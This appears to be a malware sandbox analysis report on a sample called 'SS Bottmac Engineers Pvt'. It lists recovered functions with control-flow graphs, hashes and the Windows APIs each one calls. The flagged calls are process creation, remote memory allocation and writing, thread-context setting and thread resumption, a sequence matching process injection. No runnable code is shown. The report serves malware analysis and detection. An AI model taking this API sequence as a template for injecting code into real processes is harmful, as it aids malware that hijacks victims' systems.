                                control_flow_graph 450 7aad76c-7aad80d 452 7aad80f-7aad819 450->452 453 7aad846-7aad866 450->453 452->453 454 7aad81b-7aad81d 452->454 460 7aad868-7aad872 453->460 461 7aad89f-7aad8ce 453->461 455 7aad81f-7aad829 454->455 456 7aad840-7aad843 454->456 458 7aad82b 455->458 459 7aad82d-7aad83c 455->459 456->453 458->459 459->459 462 7aad83e 459->462 460->461 463 7aad874-7aad876 460->463 467 7aad8d0-7aad8da 461->467 468 7aad907-7aad9c1 CreateProcessA 461->468 462->456 465 7aad878-7aad882 463->465 466 7aad899-7aad89c 463->466 469 7aad886-7aad895 465->469 470 7aad884 465->470 466->461 467->468 472 7aad8dc-7aad8de 467->472 481 7aad9ca-7aada50 468->481 482 7aad9c3-7aad9c9 468->482 469->469 471 7aad897 469->471 470->469 471->466 473 7aad8e0-7aad8ea 472->473 474 7aad901-7aad904 472->474 476 7aad8ee-7aad8fd 473->476 477 7aad8ec 473->477 474->468 476->476 479 7aad8ff 476->479 477->476 479->474 492 7aada52-7aada56 481->492 493 7aada60-7aada64 481->493 482->481 492->493 494 7aada58 492->494 495 7aada66-7aada6a 493->495 496 7aada74-7aada78 493->496 494->493 495->496 497 7aada6c 495->497 498 7aada7a-7aada7e 496->498 499 7aada88-7aada8c 496->499 497->496 498->499 500 7aada80 498->500 501 7aada9e-7aadaa5 499->501 502 7aada8e-7aada94 499->502 500->499 503 7aadabc 501->503 504 7aadaa7-7aadab6 501->504 502->501 506 7aadabd 503->506 504->503 506->506
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AAD9AE
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 650c3406695245434f2b51eddde4f4e6570a75acecceba33e4864f8377dff2a6
                                • Instruction ID: fb288f506d11af461cf2284000bbdf60f54506f96702b8230dfe9111d82f62d8
                                • Opcode Fuzzy Hash: 650c3406695245434f2b51eddde4f4e6570a75acecceba33e4864f8377dff2a6
                                • Instruction Fuzzy Hash: B8917EB1E0021ADFDF24CF68C841BEDBBB2BF48314F148169D869A7644DB749985CF91
                                Function 07AAD778 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 507 7aad778-7aad80d 509 7aad80f-7aad819 507->509 510 7aad846-7aad866 507->510 509->510 511 7aad81b-7aad81d 509->511 517 7aad868-7aad872 510->517 518 7aad89f-7aad8ce 510->518 512 7aad81f-7aad829 511->512 513 7aad840-7aad843 511->513 515 7aad82b 512->515 516 7aad82d-7aad83c 512->516 513->510 515->516 516->516 519 7aad83e 516->519 517->518 520 7aad874-7aad876 517->520 524 7aad8d0-7aad8da 518->524 525 7aad907-7aad9c1 CreateProcessA 518->525 519->513 522 7aad878-7aad882 520->522 523 7aad899-7aad89c 520->523 526 7aad886-7aad895 522->526 527 7aad884 522->527 523->518 524->525 529 7aad8dc-7aad8de 524->529 538 7aad9ca-7aada50 525->538 539 7aad9c3-7aad9c9 525->539 526->526 528 7aad897 526->528 527->526 528->523 530 7aad8e0-7aad8ea 529->530 531 7aad901-7aad904 529->531 533 7aad8ee-7aad8fd 530->533 534 7aad8ec 530->534 531->525 533->533 536 7aad8ff 533->536 534->533 536->531 549 7aada52-7aada56 538->549 550 7aada60-7aada64 538->550 539->538 549->550 551 7aada58 549->551 552 7aada66-7aada6a 550->552 553 7aada74-7aada78 550->553 551->550 552->553 554 7aada6c 552->554 555 7aada7a-7aada7e 553->555 556 7aada88-7aada8c 553->556 554->553 555->556 557 7aada80 555->557 558 7aada9e-7aadaa5 556->558 559 7aada8e-7aada94 556->559 557->556 560 7aadabc 558->560 561 7aadaa7-7aadab6 558->561 559->558 563 7aadabd 560->563 561->560 563->563
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AAD9AE
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 4b924592590cf3e13a8ae84eabb297567f437678a556044843024e93dc59423e
                                • Instruction ID: e6e3bd622ac9379e855857cf97f9331b560279e29f5716bc6253c02516b06c4c
                                • Opcode Fuzzy Hash: 4b924592590cf3e13a8ae84eabb297567f437678a556044843024e93dc59423e
                                • Instruction Fuzzy Hash: 9C916FB1E0021ADFDF24CF68C841BEDBBB2BF48314F148169D869A7644DB749985CF91
                                Function 0177B33A Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 564 177b33a-177b357 565 177b383-177b387 564->565 566 177b359-177b366 call 1779db8 564->566 568 177b39b-177b3dc 565->568 569 177b389-177b393 565->569 572 177b37c 566->572 573 177b368 566->573 575 177b3de-177b3e6 568->575 576 177b3e9-177b3f7 568->576 569->568 572->565 619 177b36e call 177b5e0 573->619 620 177b36e call 177b5d0 573->620 575->576 577 177b41b-177b41d 576->577 578 177b3f9-177b3fe 576->578 583 177b420-177b427 577->583 580 177b400-177b407 call 177b000 578->580 581 177b409 578->581 579 177b374-177b376 579->572 582 177b4b8-177b578 579->582 585 177b40b-177b419 580->585 581->585 614 177b580-177b5ab GetModuleHandleW 582->614 615 177b57a-177b57d 582->615 586 177b434-177b43b 583->586 587 177b429-177b431 583->587 585->583 590 177b43d-177b445 586->590 591 177b448-177b451 call 177b010 586->591 587->586 590->591 595 177b453-177b45b 591->595 596 177b45e-177b463 591->596 595->596 597 177b465-177b46c 596->597 598 177b481-177b48e 596->598 597->598 600 177b46e-177b47e call 177b020 call 177b030 597->600 605 177b4b1-177b4b7 598->605 606 177b490-177b4ae 598->606 600->598 606->605 616 177b5b4-177b5c8 614->616 617 177b5ad-177b5b3 614->617 615->614 617->616 619->579 620->579
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0177B59E
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: a7d7399066878ba864ed400369935bc4477da882020798abc8724cccaf002f4a
                                • Instruction ID: 91cd35cbcee8a1aae043384df4aa156704b0db1ea422c0639f72502d8f02c650
                                • Opcode Fuzzy Hash: a7d7399066878ba864ed400369935bc4477da882020798abc8724cccaf002f4a
                                • Instruction Fuzzy Hash: A8814670A00B058FDB25DF29D45479ABBF1FF88300F048A6ED48ADBA54E734E949CB91
                                Function 01775D0C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 621 1775d0c-1775d10 622 1775d12-1775d69 621->622 623 1775d6e-1775dd9 CreateActCtxA 621->623 622->623 625 1775de2-1775e3c 623->625 626 1775ddb-1775de1 623->626 633 1775e3e-1775e41 625->633 634 1775e4b-1775e4f 625->634 626->625 633->634 635 1775e51-1775e5d 634->635 636 1775e60 634->636 635->636 638 1775e61 636->638 638->638
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 01775DC9
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b573b5d6a1213540eaefe65aff5eacf6837257550b4b02660cc48af158037eb5
                                • Instruction ID: 4e1f2fa620586b35d82a0b6166a6dd53c342a6d66b23f701b2d4e47da9fdcaa7
                                • Opcode Fuzzy Hash: b573b5d6a1213540eaefe65aff5eacf6837257550b4b02660cc48af158037eb5
                                • Instruction Fuzzy Hash: 7041F1B0C00619CEDF25DFA9C888BDEBBF1BF49304F2084AAD418AB255DB755946CF91
                                Function 01774560 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 639 1774560-1775dd9 CreateActCtxA 642 1775de2-1775e3c 639->642 643 1775ddb-1775de1 639->643 650 1775e3e-1775e41 642->650 651 1775e4b-1775e4f 642->651 643->642 650->651 652 1775e51-1775e5d 651->652 653 1775e60 651->653 652->653 655 1775e61 653->655 655->655
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 01775DC9
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b6b787fd62b2d313a9cb05ae1fc5619488d25a1e19eefe298d8003668e38e924
                                • Instruction ID: b8a43b71212ca484dd182c8518e5445b4e041689757f956ddcd08baa51b66d1a
                                • Opcode Fuzzy Hash: b6b787fd62b2d313a9cb05ae1fc5619488d25a1e19eefe298d8003668e38e924
                                • Instruction Fuzzy Hash: D841D2B0C00619CADB24DFA9C884B9DFBB5BF49304F20846AD418AB255DBB55946CF90
                                Function 07AAD4E9 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 656 7aad4e9-7aad53e 658 7aad54e-7aad58d WriteProcessMemory 656->658 659 7aad540-7aad54c 656->659 661 7aad58f-7aad595 658->661 662 7aad596-7aad5c6 658->662 659->658 661->662
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AAD580
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: b0f3aac982104131c501952bcce075be23061b17dc5f8edc41df09c628d133ef
                                • Instruction ID: 306d32194984d962f1c9c5a7b060d67997e1d84f4051b23ab7b67dee7d45cdd2
                                • Opcode Fuzzy Hash: b0f3aac982104131c501952bcce075be23061b17dc5f8edc41df09c628d133ef
                                • Instruction Fuzzy Hash: 972128B59003099FCF10DFA9C945BEEBBF5FF48314F10842AE959A7250C7789554CBA0
                                Function 07AAD4F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 666 7aad4f0-7aad53e 668 7aad54e-7aad58d WriteProcessMemory 666->668 669 7aad540-7aad54c 666->669 671 7aad58f-7aad595 668->671 672 7aad596-7aad5c6 668->672 669->668 671->672
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AAD580
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: cc729e92ed03c5882779a3979f1d4eb9805af4033deefca6d793d6fa8b313656
                                • Instruction ID: ac843fea1aba8371b6f218592182994761b169b2135fa25634e56395e15b758b
                                • Opcode Fuzzy Hash: cc729e92ed03c5882779a3979f1d4eb9805af4033deefca6d793d6fa8b313656
                                • Instruction Fuzzy Hash: 80213BB59003099FCF10DFA9C845BEEBBF5FF48314F108429E959A7240C7789544CBA0
                                Function 07AACF18 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 676 7aacf18-7aacf6b 679 7aacf7b-7aacfab Wow64SetThreadContext 676->679 680 7aacf6d-7aacf79 676->680 682 7aacfad-7aacfb3 679->682 683 7aacfb4-7aacfe4 679->683 680->679 682->683
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AACF9E
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 67145a33c1cfe44e3b87f30a2444ab31e3531b7eb2895bec50f88f92514ff1e6
                                • Instruction ID: 0043b0959edf5a14d3f571b3d4ef7d54bfd1a35e3ce496907ff8632c2364bbaf
                                • Opcode Fuzzy Hash: 67145a33c1cfe44e3b87f30a2444ab31e3531b7eb2895bec50f88f92514ff1e6
                                • Instruction Fuzzy Hash: D52128B19003099FDB10DFAAC4857EEBBF4EF89324F14842AD569A7240CB789945CFA1
                                Function 07AAD5D9 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AAD660
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 1f0505c034125a7a72319b066ee39b93b28bf50276643b02cb560b7e86acfbb9
                                • Instruction ID: ca1f2ca859f3c52097df21fe2ba9a7bc89243c3302c762a85da98146748ab051
                                • Opcode Fuzzy Hash: 1f0505c034125a7a72319b066ee39b93b28bf50276643b02cb560b7e86acfbb9
                                • Instruction Fuzzy Hash: 0B2125B1D002599FCB10DFAAC884AEEFBF5FF48310F10842AE569A7250C7789540DBA1
                                Function 0177D820 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0177D8AF
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 618e85a6f55b3d570c75545318dda9b62293e7d1d6c1a4334e325700e8082628
                                • Instruction ID: 297d94caaf0d7ddf5e661b9408e231bc6ac883284b5def19bee611feff47fec8
                                • Opcode Fuzzy Hash: 618e85a6f55b3d570c75545318dda9b62293e7d1d6c1a4334e325700e8082628
                                • Instruction Fuzzy Hash: 9F21D2B5900248DFDF10CFA9D584AEEBFF5FB48310F14845AE918A7250C378AA44CFA0
                                Function 07AAD5E0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AAD660
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 570ced3c2c6c087d23e69c9c8ef830e88285fa77425c726df53f637d38e4d2a8
                                • Instruction ID: 650dc861ea5bec50a7b4a7f3e2840031ea7b142de10cc45aba2282c6f541f333
                                • Opcode Fuzzy Hash: 570ced3c2c6c087d23e69c9c8ef830e88285fa77425c726df53f637d38e4d2a8
                                • Instruction Fuzzy Hash: 5C2107B1D003599FCB10DFAAC885AEEFBF5FF48310F50842AE959A7250C7789944CBA5
                                Function 07AACF20 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AACF9E
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 40e5347ef572dc4b27a3769d4e53b8208cbeb6268bf00ed9d32fc3768f001257
                                • Instruction ID: a56d76f2965315447a144fb299f06c8f3740c72800d020988552a6b0508990bd
                                • Opcode Fuzzy Hash: 40e5347ef572dc4b27a3769d4e53b8208cbeb6268bf00ed9d32fc3768f001257
                                • Instruction Fuzzy Hash: D02115B19003099FDB10DFAAC5857EEFBF4EF89324F54842AD519A7240CB78A945CFA1
                                Function 0177D828 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0177D8AF
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 066ed2c3c79e075fccb174775d709b96e54b5c746467f32a6e5fca2221ffa927
                                • Instruction ID: 9cc02b88fa56bb89c6fcc95fe198431a519689dafb01703ce4eb02732af4bc21
                                • Opcode Fuzzy Hash: 066ed2c3c79e075fccb174775d709b96e54b5c746467f32a6e5fca2221ffa927
                                • Instruction Fuzzy Hash: 2A21B3B59002489FDB10CF9AD584ADEFBF9FB48310F14845AE918A7350D378A944CFA5
                                Function 07AAD429 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AAD49E
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: a54e76b0ec62c8dd84e09481bff133cf3819a243c34ed49d4a69d81dc842ae6e
                                • Instruction ID: 04333922d467525e6f9dec0791e22d70a22faa5628342e140ed70fe808c06876
                                • Opcode Fuzzy Hash: a54e76b0ec62c8dd84e09481bff133cf3819a243c34ed49d4a69d81dc842ae6e
                                • Instruction Fuzzy Hash: C01159B59002099FCB10DFA9C944AEFBFF5EF88314F208419E519A7250C779A540CFA0
                                Function 07AAD430 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AAD49E
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 6cbb641d92b7e33ef0028c5220dce00400e4163c17de83e9df84af29e3da71c9
                                • Instruction ID: ce111ab4f2cc0202edfc4651715ab9c41c315202a5d894971c149561294f2a90
                                • Opcode Fuzzy Hash: 6cbb641d92b7e33ef0028c5220dce00400e4163c17de83e9df84af29e3da71c9
                                • Instruction Fuzzy Hash: FF1137B59002499FCB10DFAAC844AEFBFF5FF88324F208419E519A7250C779A940CFA0
                                Function 07AACE68 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: f16b8f65f83d98b887f3b92847293fa20a9825116863fa4bd0b7555cba84f2a4
                                • Instruction ID: 45753dc4b9896e212a150721e352529c6ed45803c0f348a2bdd2d32cf41a0ca1
                                • Opcode Fuzzy Hash: f16b8f65f83d98b887f3b92847293fa20a9825116863fa4bd0b7555cba84f2a4
                                • Instruction Fuzzy Hash: DA1149B19002498FDB20DFA9C4457EEFBF5AF99324F20841AD519A7240CB79A540CBA0
                                Function 07AACE70 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 5995f6b593ab8dfa2ca9206b272157b8f68b21a6909410650da2403951dcddc2
                                • Instruction ID: c471381a44e5823896a547ba04fb112db74be4f859645c71a1e0bbc5a48b3813
                                • Opcode Fuzzy Hash: 5995f6b593ab8dfa2ca9206b272157b8f68b21a6909410650da2403951dcddc2
                                • Instruction Fuzzy Hash: 1B1136B1D002498FDB20DFAAC4457EFFBF5EF98324F20841AD519A7240CB79A944CBA0
                                Function 0177B538 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0177B59E
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: cf596309eb069f5865a651674c3b8a27e85c3ccba47ebc08e3c59c11c57a1a1b
                                • Instruction ID: c0767bca5b38203b61e1e5816d8be0c8bbffe3ad174aa566f61d48f056306f96
                                • Opcode Fuzzy Hash: cf596309eb069f5865a651674c3b8a27e85c3ccba47ebc08e3c59c11c57a1a1b
                                • Instruction Fuzzy Hash: BA11E0B5C002498FDB20DF9AC444ADEFBF4EF89314F24852AD929B7210D379A545CFA1
                                Function 0EC81270 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 0EC812D5
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2482531996.000000000EC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EC80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_ec80000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 2a985530cd265b5c4350c01d38888bf8fc9640d5f192d6cec75ad274ea8d77cc
                                • Instruction ID: 2321d893d8627c5914b20bde9f6da52313bd82b00a01a59ad98645db9174dadd
                                • Opcode Fuzzy Hash: 2a985530cd265b5c4350c01d38888bf8fc9640d5f192d6cec75ad274ea8d77cc
                                • Instruction Fuzzy Hash: 5E1103B5800248DFDB10DF9AC684BDEBBF8FB48314F14840AE518B7610C379A944CFA1
                                Function 0EC81278 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 0EC812D5
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2482531996.000000000EC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EC80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_ec80000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 4beff4ed99f615fa5f256edd6cdbc9eeb64974e2e4586c10ce6be0bc0b4686d8
                                • Instruction ID: 896c96651189125ef99f9a0680387d1b3f09490d60bd3571d247e298c81407f7
                                • Opcode Fuzzy Hash: 4beff4ed99f615fa5f256edd6cdbc9eeb64974e2e4586c10ce6be0bc0b4686d8
                                • Instruction Fuzzy Hash: B111D3B58003499FDB10DF9AC545BDEBBF8FB49314F14841AD518A7210C379A944CFA5
                                Function 0140D4C4 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2464926496.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_140d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5af32cb69e80fe6e652f4e290b95db154783ad1d7e0da551cd3c19ef289ff892
                                • Instruction ID: a6c62430d3b47b9e0fce2b37f53b908dc209186dcafc22981108d83ef50297ec
                                • Opcode Fuzzy Hash: 5af32cb69e80fe6e652f4e290b95db154783ad1d7e0da551cd3c19ef289ff892
                                • Instruction Fuzzy Hash: 0921F471900240DFDB06DF99D980F27BF65FB88318F20C57AED090B2A6C33AD41AC6A1
                                Function 0141D1D4 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2465026342.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_141d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f51e3d68c794747b5f656f92b7a157edf5d0ec50494b8468e0e118354e4e90a
                                • Instruction ID: cebec091728aafe04975649aa873c362aa523debd876012d22ae99a18c7ed8c2
                                • Opcode Fuzzy Hash: 3f51e3d68c794747b5f656f92b7a157edf5d0ec50494b8468e0e118354e4e90a
                                • Instruction Fuzzy Hash: C62107B1944204DFDB05DF98D9C8F66BBA5FB84324F20C66ED9194B36AC33AD406CA61
                                Function 0141D01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2465026342.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_141d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01d16551a1560dd581fe7c9b729e6ad39358584948cbf640279569c44d70a989
                                • Instruction ID: b89a43b5511a58358fded97e3ab66be961c60cc0836c884137452e90a23a4b91
                                • Opcode Fuzzy Hash: 01d16551a1560dd581fe7c9b729e6ad39358584948cbf640279569c44d70a989
                                • Instruction Fuzzy Hash: 882125F5A04200DFCB15DF68D988B16BF65FB84318F20C56ED90A0B36AC33AD407CA61
                                Function 0141D006 Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2465026342.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_141d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9acf243322edc24598b601ae466ebe9845e9a8b0c4d41acc72a812db11c3f84f
                                • Instruction ID: 60f5de3a361db47b3047c738f9cd5b45ed907235d08723096f08b53c480470c9
                                • Opcode Fuzzy Hash: 9acf243322edc24598b601ae466ebe9845e9a8b0c4d41acc72a812db11c3f84f
